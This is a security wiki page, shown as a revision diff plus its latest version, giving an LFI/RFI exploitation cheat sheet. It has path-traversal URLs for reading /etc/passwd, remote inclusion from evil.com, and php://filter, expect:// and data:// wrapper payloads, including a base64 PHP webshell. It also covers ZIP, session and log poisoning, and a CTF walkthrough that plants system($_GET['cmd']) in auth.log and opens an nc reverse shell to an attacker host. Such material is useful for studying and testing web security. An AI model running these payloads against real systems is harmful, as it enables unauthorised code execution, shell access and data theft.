Difference between revisions of "Exploiting Local/Remove File Inclusion"

(LFI Wrapper with ZIP)
m (Dropping into a system shell)
 
(26 intermediate revisions by the same user not shown)
Line 1: Line 1:
= What is LFI / RFI? =
 
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
 
 
= What is LFI / RFI? =
 
= What is LFI / RFI? =
 
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
 
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
 
== LFI / RFI Cheat Sheet ==
 
== LFI / RFI Cheat Sheet ==
<syntaxhighlight lang="bash" line>
+
<syntaxhighlight lang=shell-session line>
 
http://example.com/index.php?page=../../../etc/passwd
 
http://example.com/index.php?page=../../../etc/passwd
 
http://example.com/index.php?page=../../../etc/passwd%00
 
http://example.com/index.php?page=../../../etc/passwd%00
Line 26: Line 24:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
== LFI Wrapper with ZIP ==
+
== Exploit LFI through ZIP ==
Create a file with the following content:
+
Crate a PHP payload (e.g.: system($_GET['cmd']), zip, masking your archive as a file with different, acceptable extension
<\?php system($_GET['cmd']); \?></pre>"
 
 
<syntaxhighlight lang="bash" line>
 
<syntaxhighlight lang="bash" line>
zip payload.zip payload.php;   
+
zip payload.zip payload.php;   
 
mv payload.zip shell.jpg;     
 
mv payload.zip shell.jpg;     
 
rm payload.php   
 
rm payload.php   
 +
</syntaxhighlight>
  
 +
Execute
 +
<syntaxhighlight lang=shell-session line>
 
http://example.com/index.php?page=zip://shell.jpg%23payload.php
 
http://example.com/index.php?page=zip://shell.jpg%23payload.php
 
</syntaxhighlight>
 
</syntaxhighlight>
 +
 +
== Exploit LFI / RCE via input:// ==
 +
<syntaxhighlight lang=shell-session line>
 +
http://example.com/index.php?page=php://input
 +
DATA: <? system('whoami'); ?>
 +
</syntaxhighlight>
 +
 +
== Exploit LFI / RCE via PHP Session ==
 +
Check if the website use PHP Session (PHPSESSID)
 +
 +
<syntaxhighlight lang="bash">
 +
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
 +
Set-Cookie: user=admin; expires=Mon, 13-April-2018 00:21:29 EDT; path=/; httponly
 +
</syntaxhighlight>
 +
 +
In PHP5 these sessions are stored into /var/lib/php5/sess_[PHPSESSID]
 +
 +
Inject your command into a cookie:
 +
<syntaxhighlight lang="bash">
 +
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
 +
</syntaxhighlight>
 +
 +
And include it
 +
<syntaxhighlight lang="bash">
 +
http://example.com/index.php?page=file=/../../../../../../../../../var/lib/php5/sess_978a69sdf76987er6zdfa
 +
</syntaxhighlight>
 +
 +
== Exploit LFI / RCE via Log file ==
 +
Append PHP to a log file (use your imagination here)
 +
<syntaxhighlight lang=shell-session line>
 +
http://example.com/index.php?page=/var/log/apache/access.log
 +
http://example.com/index.php?page=/var/log/apache/error.log
 +
http://example.com/index.php?page=/var/log/vsftpd.log
 +
http://example.com/index.php?page=/var/log/sshd.log
 +
</syntaxhighlight>
 +
 +
And include it
 +
<syntaxhighlight lang="bash">
 +
http://example.com/index.php?page=/var/log/apache/access.log
 +
</syntaxhighlight>
 +
 +
== Exploit RFI wrapping DATA with "" payload ==
 +
<syntaxhighlight lang="bash">
 +
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
 +
</syntaxhighlight>
 +
 +
== Exploit RFI through EXPECT ==
 +
<syntaxhighlight lang=shell-session line>
 +
http://example.com/index.php?page=php:expect://id
 +
http://example.com/index.php?page=php:expect://ls
 +
</syntaxhighlight>
 +
 +
= Example: RCE through LFI via SSH Log Poisoning =
 +
Let's assume your target system is running a flavour of Debian (Ubuntu)) where login attempts are logged to ''auth.log'' and said file is accessible via LFI, e.g.
 +
 +
<syntaxhighlight lang=shell-session line>
 +
# curl -v -s -G --data-urlencode file=/var/log/auth.log http://192.168.56.106 |grep logind
 +
...
 +
May 9 04:54:33 hostname  systemd-login[782]: New seat seat0
 +
...
 +
</syntaxhighlight>
 +
 +
Good, we can read the log. Now let's try injecting some php into the log. The code will execute remote command and render it's output as part of response.
 +
 +
A word of caution - have to be very careful here as improperly formatted php will break the log in a way that you wont be able to load it any more. If you're planning on injecting large amount of data perhaps create a bunch of temp files under /tmp and work with these instead, keeping ''auth.log'' as a fall-back.
 +
 +
The quickest and shortest way to pass arbitrary commands to PHP would be via ''system()'' call which can be injected into ''auth.log'' as follows:
 +
 +
<syntaxhighlight lang=shell-session line>
 +
# ssh '<? system($_GET['cmd']); ?>'@192.168.56.106
 +
</syntaxhighlight>
 +
 +
Now if you browse same URL again, passing a command like ''ls'', you'll see the output of the command in pas part of the response
 +
 +
<syntaxhighlight lang=shell-session line>
 +
# curl -v -s -G --data-urlencode file=/var/log/auth.log cmd='ls -altr' http://192.168.56.106 |less
 +
...
 +
-rw-r--r--  1 www-data  root 42K  Mar 5 09:33 index.php
 +
-rw-r--r--  1 www-data  root 3.1K Mar 5 09:35 about.php
 +
-rw-r--r--  1 www-data  root 89  Mar 5 09:36 _super_secret_file.txt
 +
...
 +
</syntaxhighlight>
 +
== Dropping into a system shell ==
 +
While it might sound very tempting, dropping into a shell is not always a best idea as it will immediately show up in a list of running processes and might be picked up by IDS (Intrusion Detection System) which monitors certain files and processes, or anyone who may be keeping an eye on that host and may trigger Incident Response.
 +
 +
For the sake of CTF, however, this is not a big deal so let's do this!
 +
 +
Term 1: Start '''nc''' in listening mode
 +
<syntaxhighlight  lang=shell-session highlight="" line>
 +
root@kali:~# nc -vvvlt -p 4444
 +
listening on [any] 4444 ...
 +
</syntaxhighlight>
 +
 +
 +
Term 2: Execute remote shell command
 +
<syntaxhighlight  lang=shell-session highlight="" line>
 +
root@kali:~# curl -G --data-urlencode file=/var/log/auth.log --data-urlencode "cmd=rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1|nc 192.168.56.200 4444 >/tmp/backpipe" http://192.168.56.106
 +
</syntaxhighlight>
 +
 +
Term 1: Acknowledge reverse shell connection and spawn new ''tty'' so we can interact with it properly
 +
<syntaxhighlight  lang=shell-session highlight="" line>
 +
root@kali:~ # nc -vvvlt -p 4444
 +
listening on [any] 4444 ...
 +
connect to [192.168.56.200] from robot [192.168.56.108] 49714
 +
/bin/sh: 0: can't access tty; job control turned off
 +
$ python -c 'import pty; pty.spawn("/bin/bash")'
 +
 +
daemon@linux:/var/www $
 +
</syntaxhighlight>
 +
 +
EOF

Latest revision as of 15:59, 22 May 2018

What is LFI / RFI?

Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.

LFI / RFI Cheat Sheet

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
http://example.com/index.php?page=path/to/uploaded/file.png
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

Exploit LFI through ZIP

Crate a PHP payload (e.g.: system($_GET['cmd']), zip, masking your archive as a file with different, acceptable extension 

zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
rm payload.php

Execute 

http://example.com/index.php?page=zip://shell.jpg%23payload.php

Exploit LFI / RCE via input://

http://example.com/index.php?page=php://input
DATA: <? system('whoami'); ?>

Exploit LFI / RCE via PHP Session

Check if the website use PHP Session (PHPSESSID) 

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-April-2018 00:21:29 EDT; path=/; httponly

In PHP5 these sessions are stored into /var/lib/php5/sess_[PHPSESSID]

Inject your command into a cookie: 

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

And include it 

http://example.com/index.php?page=file=/../../../../../../../../../var/lib/php5/sess_978a69sdf76987er6zdfa

Exploit LFI / RCE via Log file

Append PHP to a log file (use your imagination here) 

http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log

And include it 

http://example.com/index.php?page=/var/log/apache/access.log

Exploit RFI wrapping DATA with "" payload

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

Exploit RFI through EXPECT

http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

Example: RCE through LFI via SSH Log Poisoning

Let's assume your target system is running a flavour of Debian (Ubuntu)) where login attempts are logged to auth.log and said file is accessible via LFI, e.g. 

# curl -v -s -G --data-urlencode file=/var/log/auth.log http://192.168.56.106 |grep logind
...
May 9 04:54:33 hostname  systemd-login[782]: New seat seat0
...

Good, we can read the log. Now let's try injecting some php into the log. The code will execute remote command and render it's output as part of response.

A word of caution - have to be very careful here as improperly formatted php will break the log in a way that you wont be able to load it any more. If you're planning on injecting large amount of data perhaps create a bunch of temp files under /tmp and work with these instead, keeping auth.log as a fall-back.

The quickest and shortest way to pass arbitrary commands to PHP would be via system() call which can be injected into auth.log as follows: 

# ssh '<? system($_GET['cmd']); ?>'@192.168.56.106

Now if you browse same URL again, passing a command like ls, you'll see the output of the command in pas part of the response 

# curl -v -s -G --data-urlencode file=/var/log/auth.log cmd='ls -altr' http://192.168.56.106 |less
...
-rw-r--r--   1 www-data  root 42K  Mar 5 09:33 index.php
-rw-r--r--   1 www-data  root 3.1K Mar 5 09:35 about.php
-rw-r--r--   1 www-data  root 89   Mar 5 09:36 _super_secret_file.txt
...

Dropping into a system shell

While it might sound very tempting, dropping into a shell is not always a best idea as it will immediately show up in a list of running processes and might be picked up by IDS (Intrusion Detection System) which monitors certain files and processes, or anyone who may be keeping an eye on that host and may trigger Incident Response.

For the sake of CTF, however, this is not a big deal so let's do this!

Term 1: Start nc in listening mode 

root@kali:~# nc -vvvlt -p 4444
listening on [any] 4444 ...


Term 2: Execute remote shell command 

root@kali:~# curl -G --data-urlencode file=/var/log/auth.log --data-urlencode "cmd=rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1|nc 192.168.56.200 4444 >/tmp/backpipe" http://192.168.56.106

Term 1: Acknowledge reverse shell connection and spawn new tty so we can interact with it properly 

root@kali:~ # nc -vvvlt -p 4444
listening on [any] 4444 ...
connect to [192.168.56.200] from robot [192.168.56.108] 49714
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'

daemon@linux:/var/www $

EOF

Retrieved from "https://blaksec.com/index.php?title=Exploiting_Local/Remove_File_Inclusion&oldid=346"